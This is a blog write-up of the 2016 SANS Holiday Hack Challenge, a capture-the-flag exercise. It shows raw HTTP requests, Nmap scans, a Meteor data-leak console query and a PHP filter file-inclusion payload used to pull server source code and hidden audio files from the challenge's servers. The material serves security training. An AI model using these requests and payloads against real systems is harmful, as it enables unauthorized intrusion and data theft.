Request to http://dev.northpolewonderland.com 80 [35.184.63.245]
Raw
POST /index.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0; Apk Testing Suite Build/MRA58K)
Host: dev.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 144
{
"date":"2016122821 41 23-0500",
"udid":"29bac7367116194d",
"debug":"com.northpolewonderland.santagram.EditProfile, EditProfile",
"freemem":20372096
}
Below is the response to the request I sent above. There is an interesting little bit here. There is a verbose option
currently set to false. It would be safe to assume that this could be changed to true and this would provide
more data.
Response
Raw
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 29 Dec 2016 02:43:23 GMT
Content-Type: application/json
Connection: close
Content-Length: 250
{
"date":"20161229024323",
"status":"OK",
"filename":"debug-20161229024323-0.txt",
"request":
{
"date":"2016122821 4123-0500",
"udid":"29bac7367116194d",
"debug":"com.northpolewonderland.santagram.EditProfile, EditProfile",
"freemem":20372096,
"verbose":false
}
}
So, I crafted the request and set the verbose parameter to true. The server provided a lot more data in
its response. It was actually more excessive. So excessive in fact that it provides the name of the next audio file.
Name of the next audio file is debug-20161224235959-0.mp3. Now it’s time to see if I can download it.
Response
Raw
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 29 Dec 2016 02:44:32 GMT
Content-Type: application/json
Connection: close
Content-Length: 436
{
"date":"20161229024432",
"date.len":14,
"status":"OK",
"status.len":"2",
"filename":"debug-20161229024432-0.txt",
"filename.len":26,
"request":
{
"date":"20161228214123-0500",
"udid":"29bac7367116194d",
"debug":"com.northpolewonderland.santagram.EditProfile, EditProfile",
"freemem":20372096,
"verbose":true,
},
"files":
[
"debug-20161224235959-0.mp3",
"debug-20161229024206-0.txt",
"debug-20161229024323-0.txt",
"debug-20161229024432-0.txt",
"index.php"
]
}
I downloaded the file using the wget(1) command. Now I have the file. Stating the obvious because i don’t know
what else to say.
wget http://dev.northpolewonderland.com/debug-20161224235959-0.mp3
--2016-12-28 18:45:12-- http://dev.northpolewonderland.com/debug-20161224235959-0.mp3
Resolving dev.northpolewonderland.com (dev.northpolewonderland.com)... 35.184.63.245
HTTP request sent, awaiting response... 200 OK
Length: 218033 (213K) [audio/mpeg]
Saving to: 'debug-20161224235959-0.mp3'
debug-20161224235959-0.mp3 100%[==================================>] 212.92K 67.5KB/s
2016-12-28 18:45:18 (67.5 KB/s) - 'debug-20161224235959-0.mp3' saved [218033/218033]
The Banner Ad Server
I will attempt to explain this part as best I can. Lot of this is done through a web browser and this blog has a no images policy. Sorry, I’m stubborn.
Found the URL for the Banner Ad Server in the strings.xml file in
the APK file. Initially, I looked for it using the string “ad”. But, that
didn’t prove very fruitful. So, I decided to use “ads” (plural) and I
found the domain for it. Domain name is ads.northpolewonderland.com.
grep -A 10 -rnw . -e "ads"
./res/values/strings.xml:29: <string name="banner_ad_url">http://ads.northpolewonderland.com/affiliate/C9E380C8-2244-41E3-93A3-D6C6700156A5</string>
./res/values/strings.xml-30- <string name="bottom_sheet_behavior">android.support.design.widget.BottomSheetBehavior</string>
./res/values/strings.xml-31- <string name="character_counter_pattern">%1$d / %2$d</string>
./res/values/strings.xml-32- <string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string>
Decided to check the ports inforamtion on the server. It’s been useful.
Looks like the only information that’s of use is the http port
that’s open. The ssh ports haven’t really been of much use. The
fun has been with the web servers anyway.
nmap ads.northpolewonderland.com
Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-22 20:48 CST
Nmap scan report for ads.northpolewonderland.com (104.198.221.240)
Host is up (0.075s latency).
rDNS record for 104.198.221.240: 240.221.198.104.bc.googleusercontent.com
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 11.82 seconds
When I went to the URL for the server http://ads.northpolewonderland.com and it looks like an ad server. “Stupid ads for Stupid people.” In the report I mention that I checked the login form for comments. But, that didn’t help me much.
This is a JavaScript website. So maybe this was the server that was using the Meteor Framework. One of the elves in the North Pole provides a tutorial on Meteor Minor. Which is a browser extension that runs through the different records, routes, templates, subscriptions, etc that are leaked by the Meteor Framework.
The output I’m seeing in the picture here shows the following data. Not
a whole lot seemed to stand out to me. In the report I state that the
/admin/quotes route looked interesting. But, when I attempted to
go to it. It stated that I needed login before I could use it.
Meteor Miner
Toggle Loaded Only
Collections
HomeQuotes 4 Records
Satisfaction 1 Record
Subscriptions
meteorlogin ServiceConfiguration
_roles
meteor_autoupdate_clientVersions
quotes
satisfaction
Templates
Home
MasterLayout
Nav
Routes
/aboutus >
/admin/quotes >
/affiliate/affiliateId >
/campaign/create >
/campaign/share >
/create >
/ >
/login >
/manage >
/register >
However, there were about five records in the Collections data. One of which was an audio file. So I decided to examine that a little.
<Field Details for HomeQuotes
4 records
_id, hidden, index, quote
1 record
_id, audio, hidden, index, quote
I opened up element inspection and went to the console. I ran the
command HomeQuotes.find().fetch(). The output provided about five
objects. One of which being the audio file which was actually hidden
from view. The find() function actually allows you to find
documents within a specific collection in Meteor Framework. Coupled with
the fetch() function with no values, it will return all of the
documents that are within the array. In this case, it provides the
relative URL to the discombobulated audio file
/ofdAR4UYRaeNxMg/discombobulatedaudio5.mp3.
HomeQuotes.find().fetch()
[> Object, > Object, > Object, >Object, Object]
_id: "zPRSTpxB5mcAH3pYk"
audio: "/ofdAR4UYRaeNxMg/discombobulatedaudio5.mp3"
hidden: true
index: 4
quote: "Just Ad It!"
> __proto__: Object
Went to the URL and it was certainly a discombobulated audio file.
The following command could have been used to download the file. In the report I actually downloaded it from the browser though.
wget http://ads.northpolewonderland.com/ofdAR4UYRaeNxMg/discombobulatedaudio5.mp3
The Uncaught Exception Handler Server
Found the URL for the Exception Handling server in the strings.xml
file. Used the grep command to search through the data in the directory
of the decompiled SantaGram application. When I looked for it back then,
I found the URL for this server in the b.java file.
The URL for the file can be found below.
Below is the output for the command.
grep -A 3 -rnw . -e "exception"
./res/values/strings.xml:35: <string name="exhandler_url">http://ex.northpolewonderland.com/exception.php</string>
./res/values/strings.xml-36- <string name="title_activity_comments">Comments</string>
./res/values/strings.xml-37-</resources>
Poked at the ex.northpolewonderland.com URL with Nmap and it
showed that SSH and HTTP was open. Looks like HTTP is the only port that
I would have needed to worry about.
nmap ex.northpolewonderland.com
Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-22 20:48 CST
Nmap scan report for ex.northpolewonderland.com (104.154.196.33)
Host is up (0.087s latency).
rDNS record for 104.154.196.33: 33.196.154.104.bc.googleusercontent.com
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 8.30 seconds
I setup Burp Suite and started poking around. I attempted to hit the URL through a web browser just to see what the response says. Response shot back with the following data.
Your request must be POST
Instead of just fiddling with random requests, I decided to proxy and
fire up the android emulator with the application installed. Objective
was to see if I could make the application mad so it would send exception
data to ex.northpolewonderland.com. Decided to open up a post within
the application that contains a large amount of comments. Loading the
comments caused the application to crash. So, the application sent the
data to the exception server. Looked through the POST requests that the
app sent to the exception server and found one with an exceptional dump
of data to look through.
Request
Raw
POST /exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; Tab2A7-20F Build/KOT49H)
Host: ex.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 1149
{
"data":
{
"model":"Tab2A7-20F",
"vmheapszlimit":"268435456",
"totalstor":"15852994556",
"udid":"a4f0fd77e07442a9",
"vmallocmem":"74804152",
"product":"Tab2A7-20F",
"busystor":"1462247424",
"freestor":"123052032",
"cpuusage":"0.0",
"vmheapsz":"82481152",
"device":"Tab2A7-20F",
"lversion":"3.4.67",
"sdkint":"19",
"strace":"java.lang.NullPointerException\n\tat com.northpolewonderland.santagram.Comments$2$a$1.done(Unknown Source\n\tat android.os.Handler.handleCallback(Handler.java:808)\n\tat android.os.Handler.dispatchMessage(Handler.java:103)\n\tat java.lang.reflect.Method.invokeNative(Native Method)\n\tat java.lang.relect.Method.invoke(Method.java:515)\n\tat com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.jave:825)\n\tat com.android.internal.os.ZygoteInit.main(ZygoteInit.java:541)\n\tat dalvik.system.NativeStart.main(Native Method)\n",
"natallocmem":"7475432"
},
"operation":"WriteCrashDump"
}
After the response came back. It showed that there was a crash dump named
crashdump-pz8n9E.php within the docs/ folder on the server.
Could have been seen by browsing to
http://ex.northpolewonderland.com/docs/crashdump-pz8n9E.php
.
Response
Raw
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Mon, 25 Dec 2016 07:12:29 GMT
Content-Type: text/html: charset=UTF-8
Connection: close
Content-Length: 81
{
"success": true,
"folder": "docs",
"crashdump": "crashdump-pz8n9E.php"
}
Decided to move on and test the keys. So I attempted to check a couple
of keys to see which ones would generate an error. When there was a typo
in the operation key. It threw an error. Though, this is the only
key I have documented that threw an error. There may be others.
Request
Raw
POST /exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; Tab2A7-20F Build/KOT49H)
Host: ex.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 1149
{
"data":
{
"model":"Tab2A7-20F",
"vmheapszlimit":"268435456",
"totalstor":"15852994556",
"udid":"a4f0fd77e07442a9",
"vmallocmem":"74804152",
"product":"Tab2A7-20F",
"busystor":"1462247424",
"freestor":"123052032",
"cpuusage":"0.0",
"vmheapsz":"82481152",
"device":"Tab2A7-20F",
"lversion":"3.4.67",
"sdkint":"19",
"strace":"java.lang.NullPointerException\n\tat com.northpolewonderland.santagram.Comments$2$a$1.done(Unknown Source\n\tat android.os.Handler.handleCallback(Handler.java:808)\n\tat android.os.Handler.dispatchMessage(Handler.java:103)\n\tat java.lang.reflect.Method.invokeNative(Native Method)\n\tat java.lang.relect.Method.invoke(Method.java:515)\n\tat com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.jave:825)\n\tat com.android.internal.os.ZygoteInit.main(ZygoteInit.java:541)\n\tat dalvik.system.NativeStart.main(Native Method)\n",
"natallocmem":"7475432"
},
"operaion":"WriteCrashDump"
}
The response to this request returned the following error. Looks like
the operation JSON key needs to either be set to WriteCrashDump or
ReadCrashDump.
I assume this means the application will either read or write crash dumps to the server.
Response
Raw
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Mon, 25 Dec 2016 07:09:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 82
Fatal error! JSON key 'operation' must be set to WriteCrashDump or
ReadCrashDump.
Moved to test more keys
Request
Raw
POST /exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; Tab2A7-20F Build/KOT49H)
Host: ex.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 1149
{
"data":
{
"model":"Tab2A7-20F",
"vmheapszlimit":"268435456",
"totalstor":"15852994556",
"udid":"a4f0fd77e07442a9",
"vmallocmem":"74804152",
"product":"Tab2A7-20F",
"busystor":"1462247424",
"freestor":"123052032",
"cpuusage":"0.0",
"vmheapsz":"82481152",
"device":"Tab2A7-20F",
"lversion":"3.4.67",
"sdkint":"19",
"strace":"java.lang.NullPointerException\n\tat com.northpolewonderland.santagram.Comments$2$a$1.done(Unknown Source\n\tat android.os.Handler.handleCallback(Handler.java:808)\n\tat android.os.Handler.dispatchMessage(Handler.java:103)\n\tat java.lang.reflect.Method.invokeNative(Native Method)\n\tat java.lang.relect.Method.invoke(Method.java:515)\n\tat com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.jave:825)\n\tat com.android.internal.os.ZygoteInit.main(ZygoteInit.java:541)\n\tat dalvik.system.NativeStart.main(Native Method)\n",
"natallocmem":"7475432"
},
"operaion":"ReadCrashDump"
}
Response
Raw
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Mon, 25 Dec 2016 07:09:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 82
Fatal error! JSON key 'crashdump' must be set.
Request
Raw
POST /exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; Tab2A7-20F Build/KOT49H)
Host: ex.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 1149
{
"date":
{
"crashdump":"crashdump-pz8n9E"
}
"operaion":"ReadCrashDump"
}
Request
Raw
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Mon, 25 Dec 2016 07:15:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 1202
{
"model": "Tab2A7-20F",
"vmheapszlimit": "268435456",
"totalstor": "1585299456",
"udid": "a4f0fd77e07442a9",
"vnallocmem": "74804152",
"product": "Tab2A7-20F",
"busystor": "1462247424",
"freestor": "123052032",
"cpuusage": "0.0",
"vmheapsz": "824481152",
"device": "Tab2A7-20F",
"lversion": "3.4.57",
"sdkint": "19",
"strace": "java.lang.NullPointerException\n\tat
con.northpolewonderland.santagram.Comment$2$a$1.done(Unkown
Source)\n\tat
com.northpolewonderland.santagram.Comments$2$a$1.done(Unkown
Source)\n\tat com.parse.ParseTaskUtils$2$1.run(Unknown Source)\n\tat
android.os.Handler.handleCallback(Handler.java:808)\n\tat
android.os.Handler.dispatchMessage(Handler.java:103)\n\tat
android.os.Looper.loop(Looper.java:193)\n\tat
android.app.ActivityThread.main(ActivityTread.java:5341)\n\tat
java.lang.reflect.Method.invokeNative(Native Method)\n\tat
java.lang.reflect.Method.invoke(Method.java:515)\n\tat
com.andoid.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:
825)\n\tat"
}
Request
Raw
POST /exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; Tab2A7-20F Build/KOT49H)
Host: ex.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 106
{
"date":
{
"crashdump":"php://filter/convert.base64-encode/resource=exception"
}
"operaion":"ReadCrashDump"
}
Response
Raw
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Mon, 26 Dec 2016 07:35:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3168
PD9waMAgCgojIEF1ZGlvIGZpb5GUgZnJvb5BEaXNjb21ibZJ1bGF0b3Iqaw4gd2Vicw9vd
DogZGzY29tYm9idWxhdGVkLMF1ZGlvLTYtWHl5RTN00Vlx505ILmlwHwoKIyBDb2RlI
GZyb20gaMR0cDovL3RoaXNpbnRlcmVzdHHtZS5jb20vcnVJZWlZaW5nLWpzbZ4tcG9zd
C1kYXRhLXZpYS1waHAVC1MgTWFrZSBzdxJL1HRoYXQgaXOgaXMgY58QT1NUIHJLCXVlc
...
<?php
# Audio file from Discombobulator in webroot: discombobulated-audio-6-XyxE3N9YqKNH.mp3
# Code from http://thisintrestsme.com/receiving-json-post-data-via-php/
# Make sure that it is a POST request.
if(strcasecmp($_SERVER['REQUEST_METHOD'], 'POST') != 0){
die("Request mothod must be POST\n");
}
# Make sure the content type of the POST request has been set to application/json
$contentType = isset($_SERVER["CONTENT_TYPE"]) ? trim($_SERVER['CONTENT_TYPE']) : '';
if(strcasecmp($contentType, 'application/json') != 0){
die("Content type must be: application/json\n");
}
# Grab the raw POST. Necessary for JSON in particular.
$content = file_get_contents("php://input");
$obj = json_decode($content, true);
# If json_decode failed, the JSON is invalid.
if(!is_array($obj)){
die("POST contains invalid JSON\n");
}
# Process the JSON.
if ( ! isset( $obj['operation'])) or (
$obj['operation'] !== "WriteCrashDump" and
$obj['operation'] !== "ReadCrashDump"))
{
die("Fatal error! JSON key 'operation' must be set to WriteCrashDump or ReadCrashDump.\n");
}
...
wget http://ex.northpolewonderland.com/discombobulated-audio-6-XyzE3N9YqKNH.mp3
--2016-12-28 18:45:12-- http://ex.northpolewonderland.com/discombobulated-audio-6-XyzE3N9YqKNH.mp3
Resolving ex.northpolewonderland.com (ex.northpolewonderland.com)... 104.154.196.33
Connecting to ex.northpolewonderland.com (ex.northpolewonderland.com)|104.154.196.33|:80...connected.
HTTP request sent, awaiting response... 200 OK
Length: 223244 (218K) [audio/mpeg]
Saving to: 'discombobulated-audio-6-XyzE3N9YqKNH.mp3'
discombobulated-au 100%[==================================>] 218.01K 576KB/s in 0.4s
2016-12-28 18:45:18 (67.5 KB/s) - 'discombobulated-audio-6-XyzE3N9YqKNH.mp3' saved [223244/223244]
The Mobile Analytics Server (post authentication)
nmap -A -O analytics.northpolewonderland.com
Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-22 20:48 CST
Nmap scan report for dev.northpolewonderland.com (35.184.63.245)
Host is up (0.087s latency).
rDNS record for 35.184.63.245: 245.63.184.35.bc.googleusercontent.com
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024
| 2048
|_ 256
443/tcp open ssl/http nginx 1.6.2
| http-git:
| 104.198.252.157:443/.git
| Git repository found!
| Repository description: Unname repository: edit this file 'description' to name the...
|_ Last commit message: Finishing touches (styles, css, etc.)
|_http-server-header: nginx/1.6.2
| http-title: Sprusage Usage Reporter!
|_Requested resource was login.php
| ssl-cert: Subject: commonName=analytics.northpolewonderland.com
| Subject Alternative Name: DNS:analytics.northpolewonderland.com
| Not valid before: 2016-12-07T17:35:00
|_Not valid after: 2017-03-07T17:35:00
|_ssl-date: TLS randomness does not represent time
| tls-nextprotong:
|_ http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 3.X|2.6.X (90%)
OS CPE: cpe:/o:linux:linux_kernel:3.2.0 cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 3.2.0 (90%), Linux 2.6.18 - 2.6.22 (86%)
Network Distance: 13 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
For each of those six items, which vulnerabilities did you discover and exploit?
This is explained in the sections above. Please read. Hugs and kisses. – Timothy (n3s0)
REMEMBER, YOU ARE AUTHORIZED TO ATTACK ONLY THE IP ADDRESSES THAT TOM HESSMAN IN THE NORTH POLE EXPLICITLY ACKNOWLEDGES AS “IN SCOPE.” ATTACK NO OTHER SYSTEMS ASSOCIATED WITH THE HOLIDAY HACK CHALLENGE.
8. What are the names of the audio files you discovered from each system above?
There are a total of SEVEN audio files (one from the original APK in Question 4, plus one for each of the six items in the bullet list above.)
- The first file is below and it was found by extracting it from the
res/raw/directory in the APK. It was embedded in the SantaGram_v4.2.apk file.discombobulatedaudio1.mp3
- This audio file can be found by logging into the Mobile Analytics server with the credentials embedded in the
SantaGram_v4.2.apkfile. Obtained it by downloading the server.discombobulatedaudio2.mp3
- The audio file was found by utilizing the debugging feature within the game named GDT. The command would allow someone to move through text in the game that led to a secret ending. This provided an email address. Needed to email
peppermint@northpolewonderland.comwho sent the audio file shortly after.discombobulatedaudio3.mp3
- Audio file was found by enabling the debugging function in the SantaGram application. Once it was on, it would send requests to the debugging server. Could then proxy these requests and modify them before they hit the server. Depending on how the request to the server was recrafted, it would provide a more verbose response. This would provide more information about the contents of the web servers root directory.
debug-20161224235959-0.mp3
- Audio file was found on the Banner Ad Server. Found this by exploiting an information leakage flaw that would provide data about the application that shouldn’t be exposed. This included subscriptions, routes, and records.
discombobulatedaudio5.mp3
- There was an ELF vulnerability in the
exception.phpfile. Editing JSON key values that can be used to read crash dumps written to the server. You can utilize the PHP filters to encode the exception resource on the server. Decoding it would provide the source code for the site that’s hosted on the server.discombobulated-audio-6-XyzE3N9YqKNH.mp3
- File was found utilizing the ‘unknown’ parameter after acquiring the source code for the site. This could be found on the Mobile Analytics Server. There was a vulnerability that allowed me to enumerate the audio file and exfiltrate it.
discombobulatedaudio7.mp3
Please note: Although each system is remotely exploitable, we DO NOT expect every participant to compromise every element of the SantaGram infrastructure. Gain access to the ones you can. Although we will give special consideration to entries that successfully compromise all six vulnerabilities and retrieve their audio files, we happily accept partial answers and point out that they too are eligible for any of the prizes.
Part 5: Discombobulated Audio
Josh sighed as he scratched his head. “Hey, sis. We’ve managed to own much of the SantaGram infrastructure, but all we’ve got to show for it is these strangely distorted audio files. They sound weird, as though they’ve been all discombobulated somehow. We certainly haven’t found the criminal who abducted Santa. Also, there’s that one door at the North Pole we haven’t been able to get open yet. Very curious, I tell you.”
Something Joshua just said triggered Jessica’s memory. “I recall seeing a weird machine here at the North Pole called ‘The Audio Discombobulator.’ Remember it? It mentioned how it cuts, mixes, and stirs songs together, and then distributes them throughout the North Pole. I guess that explains the music that saturates everything up here. Perhaps these weird audio files came from that machine… but they don’t sound much like music, and certainly not whole songs.”
“What if…” Josh contemplated, “…the villain walked by the Audio Discombobulator and uttered something… Not a song, which the machine is used to dealing with, but instead a sentence or a phrase. The machine might have heard that, cut it up, mixed it, and then distributed it throughout the North Pole!”
Jess concluded the thought, “Wow! Let’s see if we can put the pieces of this crazy audio puzzle back together. It might help us find the bad guy.”
And, finally, Dear Reader, now is your chance to bring the foul villain who nabbed Santa to justice. Analyze the audio files and find the villain in the North Pole to answer these questions:
9) Who is the villain behind the nefarious plot.
Is that a question or a statement? Just now realizing this four years later. Regardless, I didn’t catch this when I was younger. So, I’ll provide the steps I utilized to finish this up.
When I first looked at the audio files throughout the challenge I noticed that they’d been slowed to a point that rendered them incomprehensible. The following is a listing of the files.
root@solitude:~/Desktop/Audio Files# ls
discombobulatedaudio1.mp3 discombobulatedaudio5.mp3
discombobulatedaudio2.mp3 discombobulated-audio-6-XyzE3N9YqKNH.mp3
discombobulatedaudio3.mp3 discombobulatedaudio7.mp3
discombobulatedaudio4.mp3
Using a tool named mp3wrap(1) I concatenated the audio file in order from one to seven. Mp3Wrap is
a command line utility that wraps multiple audio files into one. Doing so in the order they’re specified
after you provide the output file. Utilized the following command to do this.
mp3wrap discombobulatedaudio1-7.mp3 discombobulatedaudio1.mp3 discombobulatedaudio2.mp3 discombobulatedaudio3.mp3 discombobulatedaudio4.mp3 discombobulatedaudio5.mp3 discombobulated-audio-6-XyzE3N9YqKNH.mp3 discombobulatedaudio7.mp3
Mp3Wrap Version 0.5 (2003/Jan/16). See README and COPYING for more!
Written and copyrights by Matteo Trotta - <matteo.trotta@lib.unimib.it>
THIS SOFTWARE COMES WITH ABSOLUTELY NO WARRANTY! USE AT YOUR OWN RISK!
14 % --> Wrapping discombobulatedaudio1.mp3 ... OK
28 % --> Wrapping discombobulatedaudio2.mp3 ... OK
42 % --> Wrapping discombobulatedaudio3.mp3 ... OK
57 % --> Wrapping discombobulatedaudio4.mp3 ... OK
71 % --> Wrapping discombobulatedaudio5.mp3 ... OK
85 % --> Wrapping discombobulated-audio-6-XyzE3N9YqKNH.mp3 ... OK
100 % --> Wrapping discombobulatedaudio7.mp3 ... OK
Calculating CRC, please wait... OK
discombobulatedaudio1-4_MP3WRAP.mp3 has been created successfully!
Use mp3splt to dewrap file; download at http://m3splt.sourceforge.net!
Once the new file was generated, I dropped the audio file into Audacity and started playing with the tempo changing effect. Perodically previewing the sound of the audio. Sound started to improve after increasing the tempo by about 400%. But, I was only hearing bits and pieces. When I increased the tempo by 800%, I could hear the phrase clearly.
- “Father Christmas Santa Claus or as I’ve always known him Jeff”
This is a quote from the Doctor Who episode, A Christmas Carol. I googled it. This is the password for opening the door to the hidden corridor.
10) Why had the villain abducted Santa?
Doctor Who is the villain behind this. He can be found through the hidden corridor by using the password provided by the audio files. Doctor Who abducted Santa to prevent the Star Wars Holiday Special from happening in our timeline. I guess Dr. Who isn’t a fan. He states that he looks into the time vortex an saw a universe where it didn’t exist. Stated that people were happier there. Dr. Who obviously has no chill. I’ve honestly never watched the Star Wars Holiday Special. I will provide the dialog below.
<Dr. Who> - The question of the hour is this Who nabbed Santa.
<Dr. Who> - The answer? Yes, I did.
<Dr. Who> - Next question Why would anyone in his right mind kidnap Santa Claus?
<Dr. Who> - The answer. Do I look like I'm in my right mind? I'm a madman with a box.
<Dr. Who> - I have looked into the time vortex and I have seen a universe in which the Star Wars Holiday
Special was NEVER released. In that universe, 1970 came and went as normal. No one had to endure the misery
of watching that abominate blight. People were happy there. It's a better life, I tell you, a better world
than the scarred one we endure here.
Please note: You can determine the plot and the identity of the villain with access to as few as five of the seven audio files. However, as stated above, participants who gain access to all seven audio files will be given special consideration. Again, you do not need to compromise all the SantaGram servers to answer items 9 and 10. Partial answers are completely welcomed and are certainly eligible to win.
Epilogue: Bringing It All Home
With Santa’s rescue and the discovery of his abductor, the Dosis children were finally satisfied that Christmas was now safe. They contacted their father’s friends in law enforcement to ensure the villain would pay for his crime.
And that, Dear Reader, is the story of how you helped the Dosis children save Christmas and preserve the whole holiday season yet again.
Please answer each question by January 4, 2017*, sending your description of how you unraveled each one to SANSHolidayHackChallenge@counterhack.com . From all submitted entries, we’ll pick ten winners, according to the following plan:
- Seven random draw answers selected from all entries, regardless of how complete or incomplete they are
- The best technical answer
- The most creative answer that is technically correct
- The best overall answer, our Grand Prize Winner
- Remember, even if you can’t answer one or more of the questions, please do send in an answer of any kind to be entered in that random draw. Seriously, if you get 50%, 80%, or 98% of the answers, you’ll still be eligible to win.
The seven random draw answers will receive a much coveted, beautiful, and soft-to-the-touch NetWars T-Shirt.
The best technical answer and most creative answer winners will receive a subscription to NetWars Continuous, with 4 months of access to the exciting SANS cyber range to develop skills, have fun, and earn CPEs!
And, check this out:
The Grand Prize** for the SANS Holiday Hack Challenge is one free SANS Online Training course of your choice! The winner will choose from any of SANS’ 30+ Online Courses, and will complete SANS training at their own pace from anywhere on the Internet.
Happy Holidays!
–Counter Hack and Friends
- Any time zone on planet Earth will do.
SANS will choose only one winner for the Grand Prize. The SANS Online Training seat is not transferable to another person or event and does not include a certification attempt. No substitutions are allowed for the SANS Online Training seat. For any of these prizes, SANS is not responsible for lost, late, or unintelligible entries, lost connections, miscommunications, failed transmissions, other technical difficulties or failures.
References
I provided some references that I used to finish this. Perhaps this list may be useful to anyone else in the future as well.
But, perhaps they wont be. I’ve been finding that some of these links are no longer available. I have also looked for the articles online. But, cannot find them.
- Mining Meteor - Meteor Framework Vulnerability
- Getting Moar Value Out of PHP Location File Include Vulnerabilities
- Joshua Wrights presentation from HackFest 2016
- Meteor Framework
- SANS Pen Test - How To’s: Manipulating Android Applications - Video on manipulating Android applications
- For mounting Raspberry Pi images - https://pen-testing.sans.org/blog/2016/12/07/mount-a-raspberry-pi-file-system-image
- Man Pages – sudo(1), strings(1), tcpdump(1), find(1), silver-searcher-ag(1), apktool(1), nmap(1), grep(1), xxd(1) etc.